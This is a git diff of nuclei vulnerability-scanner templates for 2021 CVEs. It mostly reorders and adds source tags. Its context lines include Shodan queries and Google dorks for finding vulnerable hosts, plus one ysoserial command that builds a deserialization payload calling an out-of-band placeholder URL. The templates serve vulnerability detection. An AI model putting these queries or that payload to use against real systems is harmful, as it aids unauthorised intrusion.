b/config/nuclei-templates/cves/2021/CVE-2021-24910.yaml index 1b3178b2d..e3afc69c6 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24910.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24910.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2021,wordpress,wp-plugin,xss,wp + tags: wp-plugin,xss,wp,wpscan,cve,cve2021,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24926.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24926.yaml index c705851aa..15e26e41e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24926.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24926.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24926 cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + tags: wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24947.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24947.yaml index f17ae69b4..083865bf2 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24947.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24947.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24947 cwe-id: CWE-863 - tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr + tags: cve,authenticated,wpscan,cve2021,lfi,wp,wordpress,wp-plugin,lfr requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24987.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24987.yaml index 319a07883..0a151af08 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24987.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24987.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24987 cwe-id: CWE-79 - tags: xss,wp,wp-plugin,wordpress,cve,cve2021 + tags: cve,cve2021,wpscan,xss,wp,wp-plugin,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24991.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24991.yaml index 232d25dac..a8de90516 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24991.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24991.yaml @@ -13,7 +13,7 @@ info: cvss-score: 4.8 cve-id: CVE-2021-24991 cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24997.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24997.yaml index 96d9aedf4..d6f4dad84 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24997.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24997.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24997 cwe-id: CWE-862 - tags: wordpress,guppy,api,cve2021,cve,wp-plugin + tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan requests: - method: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25008.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25008.yaml index fd3cfff4c..a3ce41592 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25008.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25008.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25008 cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25028.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25028.yaml index 276b76a71..af42ce3c8 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25028.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25028.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25028 cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,eventtickets + tags: wordpress,redirect,wp-plugin,eventtickets,wpscan,cve,cve2021 requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25033.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25033.yaml index 7d66072b8..f681ba8c9 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25033.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25033.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25033 cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,noptin,wp + tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,noptin requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25052.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25052.yaml index 0ac1b0987..c836d8b9a 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25052.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25052.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25052 cwe-id: CWE-352 - tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated + tags: wp-plugin,authenticated,wpscan,cve,cve2021,rfi,wp,wordpress requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25055.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25055.yaml index b66669b70..f9c1230c6 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25055.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25055.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25055 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25063.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25063.yaml index 6647da3e1..7626bad61 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25063.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25063.yaml @@ -12,7 +12,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25063 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated + tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,contactform,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25074.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25074.yaml index 3ae03aa67..4fd3f95eb 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25074.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25074.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25074 cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,webpconverter + tags: redirect,wp-plugin,webpconverter,wpscan,cve,cve2021,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25075.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25075.yaml index 2d8145956..0a87e1163 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25075.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25075.yaml @@ -15,7 +15,7 @@ info: cvss-score: 3.50 cve-id: CVE-2021-25075 cwe-id: CWE-862 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25085.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25085.yaml index efc744a83..332e87d77 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25085.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25085.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25085 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,xss + tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25111.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25111.yaml index 506e3d799..5f19090f6 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25111.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25111.yaml @@ -7,7 +7,7 @@ info: description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue. reference: - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 - tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth + tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25112.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25112.yaml index 62f50c068..4ab1f5564 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25112.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25112.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25112 cwe-id: CWE-79 - tags: wordpress,wp-plugin,wp,authenticated,whmcs,xss + tags: whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25118.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25118.yaml index 733c8d5eb..b82074a3b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25118.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25118.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2021-25118 cwe-id: CWE-200 - tags: wordpress,cve2021,wp-plugin,fpd,cve,wp + tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-25120.yaml b/config/nuclei-templates/cves/2021/CVE-2021-25120.yaml index 5b471c1c4..d83d46fac 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-25120.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-25120.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25120 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-26085.yaml b/config/nuclei-templates/cves/2021/CVE-2021-26085.yaml index c22b5688b..d0c5c959e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-26085.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-26085.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-862 metadata: shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2021,confluence,atlassian,lfi,kev + tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-26086.yaml b/config/nuclei-templates/cves/2021/CVE-2021-26086.yaml index 034fb34e9..3eba4131e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-26086.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-26086.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-22 metadata: shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2021,jira,lfi + tags: lfi,packetstorm,cve,cve2021,jira requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-26295.yaml b/config/nuclei-templates/cves/2021/CVE-2021-26295.yaml index 39cc8c8c2..5fb08129d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-26295.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-26295.yaml @@ -22,7 +22,7 @@ info: shodan-query: OFBiz.Visitor= verified: "true" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex - tags: cve,cve2021,apache,ofbiz,deserialization,rce + tags: packetstorm,cve,cve2021,apache,ofbiz,deserialization,rce requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-26598.yaml b/config/nuclei-templates/cves/2021/CVE-2021-26598.yaml index 148674a26..53e5abe4a 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-26598.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-26598.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-287 metadata: shodan-query: http.html:"ImpressCMS" - tags: cve,cve2021,impresscms,unauth,cms + tags: hackerone,cve,cve2021,impresscms,unauth,cms requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-26723.yaml b/config/nuclei-templates/cves/2021/CVE-2021-26723.yaml index 4b4c3b7a8..48a762b3f 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-26723.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-26723.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26723 cwe-id: CWE-79 - tags: cve,cve2021,jenzabar,xss + tags: packetstorm,cve,cve2021,jenzabar,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-27330.yaml b/config/nuclei-templates/cves/2021/CVE-2021-27330.yaml index f20665ee0..f005ed631 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-27330.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-27330.yaml @@ -19,7 +19,7 @@ info: metadata: google-dork: intitle:TriConsole.com - PHP Calendar Date Picker verified: "true" - tags: cve,cve2021,triconsole,xss + tags: xss,edb,cve,cve2021,triconsole requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-27519.yaml b/config/nuclei-templates/cves/2021/CVE-2021-27519.yaml index bc930ab11..61f14a6df 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-27519.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-27519.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: 'http.html:"Powered by: FUDforum"' verified: "true" - tags: cve,cve2021,xss,fudforum + tags: xss,fudforum,edb,packetstorm,cve,cve2021 requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-28164.yaml b/config/nuclei-templates/cves/2021/CVE-2021-28164.yaml index be040c4bd..609e6d04c 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-28164.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-28164.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28164 cwe-id: CWE-200 - tags: cve,cve2021,jetty + tags: vulhub,cve,cve2021,jetty requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-29203.yaml b/config/nuclei-templates/cves/2021/CVE-2021-29203.yaml index 218988467..0189e4eaf 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-29203.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-29203.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29203 cwe-id: CWE-287 - tags: hpe,cve,cve2021,bypass + tags: hpe,cve,cve2021,bypass,tenable requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-3129.yaml b/config/nuclei-templates/cves/2021/CVE-2021-3129.yaml index 2b15e8903..fe9b4f139 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-3129.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-3129.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3129 - tags: cve,cve2021,laravel,rce + tags: cve,cve2021,laravel,rce,vulhub requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-31537.yaml b/config/nuclei-templates/cves/2021/CVE-2021-31537.yaml index 4ef98e0a4..97439ab47 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-31537.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-31537.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31537 cwe-id: CWE-79 - tags: cve,cve2021,xss + tags: cve,cve2021,xss,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-31589.yaml b/config/nuclei-templates/cves/2021/CVE-2021-31589.yaml index f28ff8aa5..e8ae46f1b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-31589.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-31589.yaml @@ -18,7 +18,7 @@ info: metadata: google-dork: '"BeyondTrust" "Redistribution Prohibited"' shodan-query: 'set-cookie: nsbase_session' - tags: cve,cve2021,beyondtrust,bomgar,xss + tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-31602.yaml b/config/nuclei-templates/cves/2021/CVE-2021-31602.yaml index ea2c1430e..d27a41531 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-31602.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-31602.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-863 metadata: shodan-query: Pentaho - tags: cve,cve2021,pentaho,auth-bypass,spring + tags: spring,seclists,cve,cve2021,pentaho,auth-bypass requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-32305.yaml b/config/nuclei-templates/cves/2021/CVE-2021-32305.yaml index 45fb64b4c..6f581369b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-32305.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-32305.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32305 cwe-id: CWE-78 - tags: cve,cve2021,websvn,rce,oast + tags: cve,cve2021,websvn,rce,oast,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-32789.yaml b/config/nuclei-templates/cves/2021/CVE-2021-32789.yaml index a44463240..0ca835d4d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-32789.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-32789.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-32789 cwe-id: CWE-89 - tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp + tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-33044.yaml b/config/nuclei-templates/cves/2021/CVE-2021-33044.yaml index c3764dd5b..6732351f6 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-33044.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-33044.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 - tags: dahua,cve,cve2021,auth-bypass + tags: dahua,cve,cve2021,auth-bypass,seclists requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-33221.yaml b/config/nuclei-templates/cves/2021/CVE-2021-33221.yaml index 3b6825a4e..ea34de76d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-33221.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-33221.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33221 cwe-id: CWE-306 - tags: cve,cve2021,commscope,ruckus,debug,service,leak + tags: cve2021,commscope,ruckus,debug,service,leak,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml b/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml index 8ae13590a..78811c5c2 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3378 cwe-id: CWE-434 - tags: cve,cve2021,fortilogger,fortigate,fortinet + tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021 requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-33904.yaml b/config/nuclei-templates/cves/2021/CVE-2021-33904.yaml index 331900d02..88ca2a982 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-33904.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-33904.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-33904 cwe-id: CWE-79 - tags: cve,cve2021,accela,xss + tags: cve2021,accela,xss,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-34370.yaml b/config/nuclei-templates/cves/2021/CVE-2021-34370.yaml index b31553924..927dad394 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-34370.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-34370.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-34370 cwe-id: CWE-79 - tags: xss,redirect,cve,cve2021,accela + tags: xss,redirect,cve,cve2021,accela,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-34621.yaml b/config/nuclei-templates/cves/2021/CVE-2021-34621.yaml index 7e6130d9e..60594dba0 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-34621.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-34621.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-34621 cwe-id: CWE-269 - tags: cve,cve2021,wordpress,wp-plugin + tags: wordpress,wp-plugin,packetstorm,cve,cve2021 requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-34640.yaml b/config/nuclei-templates/cves/2021/CVE-2021-34640.yaml index f56d7fe0d..e6a0f0ab7 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-34640.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-34640.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-34640 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-34643.yaml b/config/nuclei-templates/cves/2021/CVE-2021-34643.yaml index 9f2ef12d8..0cf31a9da 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-34643.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-34643.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-34643 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-34805.yaml b/config/nuclei-templates/cves/2021/CVE-2021-34805.yaml index 7bf31be43..255b5c9aa 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-34805.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-34805.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-34805 cwe-id: CWE-22 - tags: cve,cve2021,faust,iserver,lfi + tags: lfi,packetstorm,cve,cve2021,faust,iserver requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-35464.yaml b/config/nuclei-templates/cves/2021/CVE-2021-35464.yaml index e988c7c90..157369db7 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-35464.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-35464.yaml @@ -21,7 +21,7 @@ info: cwe-id: CWE-502 metadata: shodan-query: http.title:"OpenAM" - tags: cve,cve2021,openam,rce,java,kev,cisa + tags: cve,cve2021,openam,rce,java,kev,cisa,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-36356.yaml b/config/nuclei-templates/cves/2021/CVE-2021-36356.yaml index af120b662..282163136 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-36356.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-36356.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - tags: rce,viaware,cve,cve2021,kramer + tags: viaware,cve,cve2021,kramer,edb,rce requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-3654.yaml b/config/nuclei-templates/cves/2021/CVE-2021-3654.yaml index 8d04d9736..89990fba3 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-3654.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-3654.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-3654 cwe-id: CWE-601 - tags: redirect,novnc,cve,cve2021 + tags: redirect,novnc,cve,cve2021,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-37573.yaml b/config/nuclei-templates/cves/2021/CVE-2021-37573.yaml index 6d291320a..29b89b20e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-37573.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-37573.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-37573 cwe-id: CWE-79 - tags: cve,cve2021,xss,tjws,java + tags: cve,cve2021,xss,tjws,java,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-38702.yaml b/config/nuclei-templates/cves/2021/CVE-2021-38702.yaml index 4c1fde131..963ec25c4 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-38702.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-38702.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 - tags: cve,cve2021,cyberoam,netgenie,xss,router + tags: cve2021,cyberoam,netgenie,xss,router,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-39226.yaml b/config/nuclei-templates/cves/2021/CVE-2021-39226.yaml index c94809fca..771dc8be3 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-39226.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-39226.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-287 metadata: shodan-query: title:"Grafana" - tags: cve,cve2021,grafana + tags: cve,cve2021,grafana,kev requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-39312.yaml b/config/nuclei-templates/cves/2021/CVE-2021-39312.yaml index 57a7e7184..15ebd6452 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-39312.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-39312.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39312 cwe-id: CWE-22,CWE-22 - tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr + tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-39316.yaml b/config/nuclei-templates/cves/2021/CVE-2021-39316.yaml index 9a563f91e..661f56553 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-39316.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-39316.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39316 cwe-id: CWE-22 - tags: cve,cve2021,wp,wordpress,lfi,wp-plugin,zoomsounds + tags: wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,cve,wp,cve2021,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-39320.yaml b/config/nuclei-templates/cves/2021/CVE-2021-39320.yaml index 6e634f107..9eb029ca6 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-39320.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-39320.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-39320 cwe-id: CWE-79 - tags: wordpress,xss,cve,cve2021,wp-plugin + tags: wordpress,xss,cve,cve2021,wp-plugin,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-39322.yaml b/config/nuclei-templates/cves/2021/CVE-2021-39322.yaml index 80b3ada7a..fc508423f 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-39322.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-39322.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-39322 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-39327.yaml b/config/nuclei-templates/cves/2021/CVE-2021-39327.yaml index f78e4f755..2022351c1 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-39327.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-39327.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.3 cve-id: CVE-2021-39327 cwe-id: CWE-200 - tags: cve,cve2021,wordpress,exposures + tags: exposures,packetstorm,cve,cve2021,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-39350.yaml b/config/nuclei-templates/cves/2021/CVE-2021-39350.yaml index 330eb99f1..c105bdb23 100644 --- 